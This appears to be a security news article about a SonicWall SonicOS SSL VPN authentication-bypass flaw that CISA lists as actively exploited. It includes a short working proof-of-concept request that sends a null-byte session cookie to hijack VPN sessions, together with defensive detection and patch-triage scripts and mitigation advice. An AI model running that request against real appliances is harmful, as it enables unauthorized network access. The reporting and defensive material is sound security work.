Categories: Cyber Security News

CISA Warns of SonicWall SonicOS RCE Vulnerability Actively Exploited in the Wild

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has escalated warnings about a critical zero-day vulnerability in SonicWall’s SonicOS, designating CVE-2024-53704 for immediate remediation in its Known Exploited Vulnerabilities (KEV) catalog.

This improper authentication flaw, which enables remote attackers to hijack active SSL VPN sessions without credentials, has been confirmed as actively exploited in the wild.

Federal agencies must patch affected systems by March 11, 2025, under Binding Operational Directive (BOD) 22-01. The vulnerability’s exploitation underscores persistent risks in widely deployed network security appliances and highlights the tactical evolution of threat actors targeting authentication bypass mechanisms.

Technical Analysis of CVE-2024-53704

The vulnerability resides in SonicOS’s SSL VPN authentication mechanism, specifically within the getSslvpnSessionFromCookie function. This function mishandles Base64-encoded session cookies, allowing attackers to bypass authentication by crafting malicious payloads.

The flawed processing of null characters in decoded cookies enables session hijacking, granting unauthorized access to VPN tunnels.

Researchers at Bishop Fox demonstrated that encoding 32 null bytes into a Base64 string and injecting it via the swap cookie grants full control over active sessions. A proof-of-concept Python script reveals the simplicity of the exploit:

import base64, requests, urllib3, warnings

# Suppress the self-signed-certificate warning for the appliance's HTTPS endpoint
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)

# Base64-encode 32 null bytes; this is the malformed "swap" session cookie
payload = base64.b64encode(b"\x00" * 32).decode()

# Present the crafted cookie to the SSL VPN client endpoint without credentials
resp = requests.get(
    "https://192.168.50.189:4433/cgi-bin/sslvpnclient?launchplatform=",
    cookies={"swap": payload},
    verify=False
)
print(resp.headers)
print(resp.text)

This script generates a malformed cookie that triggers the authentication bypass, enabling attackers to hijack sessions without credentials. The exploit’s low complexity and lack of required privileges contribute to its CVSSv3 score of 9.8, reflecting critical severity.
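The exploitation signature described above is visible to defenders: a swap cookie that decodes to null bytes. The following detection check is an added example (not code from the article or from Bishop Fox); the log lines, IP addresses and the log layout are constructed for illustration and do not reproduce any real SonicWall log format.

```python
import base64
import binascii
import re
from typing import List, Optional, Tuple

# Base64 of 32 NUL bytes is 43 'A' characters plus one '=' pad.
NULL_COOKIE = "A" * 43 + "="

# Constructed sample access-log lines: a benign session cookie, a request
# carrying the all-null swap cookie, and one with an undecodable cookie value.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [12/Feb/2025:09:14:02 +0000] "GET /cgi-bin/sslvpnclient?launchplatform= HTTP/1.1" 200 512 "swap=c2Vzc2lvbi0xMjM0NQ=="',
    '203.0.113.9 - - [12/Feb/2025:09:14:05 +0000] "GET /cgi-bin/sslvpnclient?launchplatform= HTTP/1.1" 200 512 "swap=' + NULL_COOKIE + '"',
    '198.51.100.2 - - [12/Feb/2025:09:14:07 +0000] "GET /cgi-bin/sslvpnclient?launchplatform= HTTP/1.1" 403 0 "swap=!!notbase64!!"',
])

# Cookie value runs up to the next quote, semicolon or whitespace.
COOKIE_RE = re.compile(r'swap=([^"\s;]*)')


def decode_swap_cookie(value: str) -> Optional[bytes]:
    """Strict Base64 decode; None when the value is not valid Base64 at all."""
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None


def is_suspicious_cookie(value: str) -> bool:
    """A legitimate session token never decodes to NUL bytes; that is the
    malformed input the vulnerable cookie parser mishandles."""
    raw = decode_swap_cookie(value)
    return raw is not None and b"\x00" in raw


def scan_log(text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, reason) for every line whose swap cookie warrants review."""
    hits = []
    for line in text.splitlines():
        match = COOKIE_RE.search(line)
        if not match:
            continue
        client_ip = line.split(" ", 1)[0]
        raw = decode_swap_cookie(match.group(1))
        if raw is None:
            hits.append((client_ip, "undecodable swap cookie"))
        elif b"\x00" in raw:
            nul_count = raw.count(b"\x00")
            hits.append((client_ip, f"swap cookie decodes to {nul_count} NUL bytes"))
    return hits
```

The same null-byte check, applied server-side before a cookie is looked up, is the validation the vulnerable parser lacked.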

Affected Products and Patch Status

CVE-2024-53704 impacts multiple SonicOS versions, including:

  • SonicOS 7.1.x (versions up to 7.1.1-7058)
  • SonicOS 7.1.2-7019
  • SonicOS 8.0.0-8035

SonicWall has released updated firmware to address the flaw, urging immediate upgrades for all Gen5–Gen7 firewalls. Organizations unable to patch immediately should restrict SSL VPN access to trusted IPs, disable internet-facing management interfaces, and enforce multi-factor authentication (MFA) for all VPN users.

While CISA’s KEV entry does not explicitly confirm ransomware involvement, historical patterns suggest plausible connections.

In September 2024, CVE-2024-40766, another critical SonicOS flaw, was exploited by Akira ransomware affiliates to compromise SSLVPN accounts lacking MFA and centralized authentication.

Arctic Wolf observed identical tactics in CVE-2024-53704 exploitation: locally managed accounts, disabled MFA, and outdated firmware. Rapid7 further noted circumstantial evidence linking SonicWall SSLVPN breaches to ransomware initial access. These parallels indicate that threat actors systematically target SonicWall vulnerabilities, leveraging authentication gaps to deploy ransomware payloads.

Federal and Enterprise Risk Exposure

With over 500,000 global customers, including government agencies, SonicWall’s widespread adoption amplifies CVE-2024-53704’s risk profile. Federal agencies now face a March 11 deadline to remediate the vulnerability, per CISA’s directive.

Private sector entities, particularly in healthcare, finance, and critical infrastructure, must also prioritize patching to avoid operational disruption.

The exploit’s ability to bypass authentication undetected complicates incident response, as attackers gain persistent access without triggering traditional intrusion alerts.

Mitigation Strategies and Best Practices

  1. Apply Vendor Patches: Upgrade to SonicOS versions beyond 7.1.1-7058, 7.1.2-7019, and 8.0.0-8035.
  2. Enforce MFA: Implement time-based one-time passwords (TOTP) or email OTPs for all SSLVPN users, eliminating reliance on single-factor authentication.
  3. Network Segmentation: Restrict SSL VPN and management console access to predefined IP ranges, minimizing exposure to untrusted networks.
  4. Password Policies: Reset credentials for locally managed SSLVPN accounts and integrate with centralized directories like Active Directory to reduce credential theft risks.
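Step 1 turns into a triage question across a fleet: which firewalls run a listed build? The version check below is an added example (not SonicWall's or the article's code). It assumes, from the article's "beyond" wording, that builds later than the listed ones on the same branch are fixed; the inventory hostnames and the non-listed version numbers are invented for illustration.

```python
import re
from typing import Dict, List

# Affected builds as the article lists them. Assumption: on each listed branch,
# builds up to and including the listed build are affected, later ones fixed.
AFFECTED_CEILINGS = {
    (7, 1, 1): 7058,  # SonicOS 7.1.x (versions up to 7.1.1-7058)
    (7, 1, 2): 7019,  # SonicOS 7.1.2-7019
    (8, 0, 0): 8035,  # SonicOS 8.0.0-8035
}
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-(\d+)$")


def parse_version(text: str):
    """Parse 'major.minor.patch-build' into ((major, minor, patch), build), or None."""
    match = VERSION_RE.match(text.strip())
    if not match:
        return None
    major, minor, patch, build = (int(g) for g in match.groups())
    return (major, minor, patch), build


def classify(version: str) -> str:
    """Return 'affected', 'fixed', 'unlisted' (branch the article does not cover) or 'invalid'."""
    parsed = parse_version(version)
    if parsed is None:
        return "invalid"
    branch, build = parsed
    if branch in AFFECTED_CEILINGS:
        return "affected" if build <= AFFECTED_CEILINGS[branch] else "fixed"
    if branch[:2] == (7, 1):
        # 7.1.0-* predates the 7.1.1-7058 ceiling; 7.1.3+ is beyond every listed 7.1 build
        return "affected" if branch < (7, 1, 1) else "fixed"
    if branch[:2] == (8, 0):
        return "fixed"  # 8.0.1+ is beyond 8.0.0-8035
    return "unlisted"  # e.g. 6.5.x or 7.0.x: consult the vendor advisory directly


def triage(inventory: Dict[str, str]) -> List[str]:
    """Hostnames running an affected build, sorted for the patch ticket."""
    return sorted(host for host, ver in inventory.items() if classify(ver) == "affected")


# Constructed sample inventory; hostnames and unlisted version numbers are invented.
SAMPLE_INVENTORY = {
    "fw-branch-01": "7.1.1-7058",
    "fw-branch-02": "7.1.2-7019",
    "fw-dc-01": "7.1.3-7001",
    "fw-dc-02": "8.0.0-8035",
    "fw-dc-03": "8.0.0-8036",
    "fw-lab-01": "7.0.1-5000",
}
```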

Organizations should adopt continuous vulnerability management frameworks, aligning patch cycles with CISA KEV updates. Proactive monitoring for anomalous VPN logins, such as off-hours access or geographic irregularities, can detect exploitation attempts. Additionally, migrating from SSL VPNs to zero-trust network access (ZTNA) models reduces reliance on perimeter-based security, limiting attack surfaces.

The post CISA Warns of SonicWall SonicOS RCE Vulnerability Actively Exploited in the Wild appeared first on Cyber Security News.
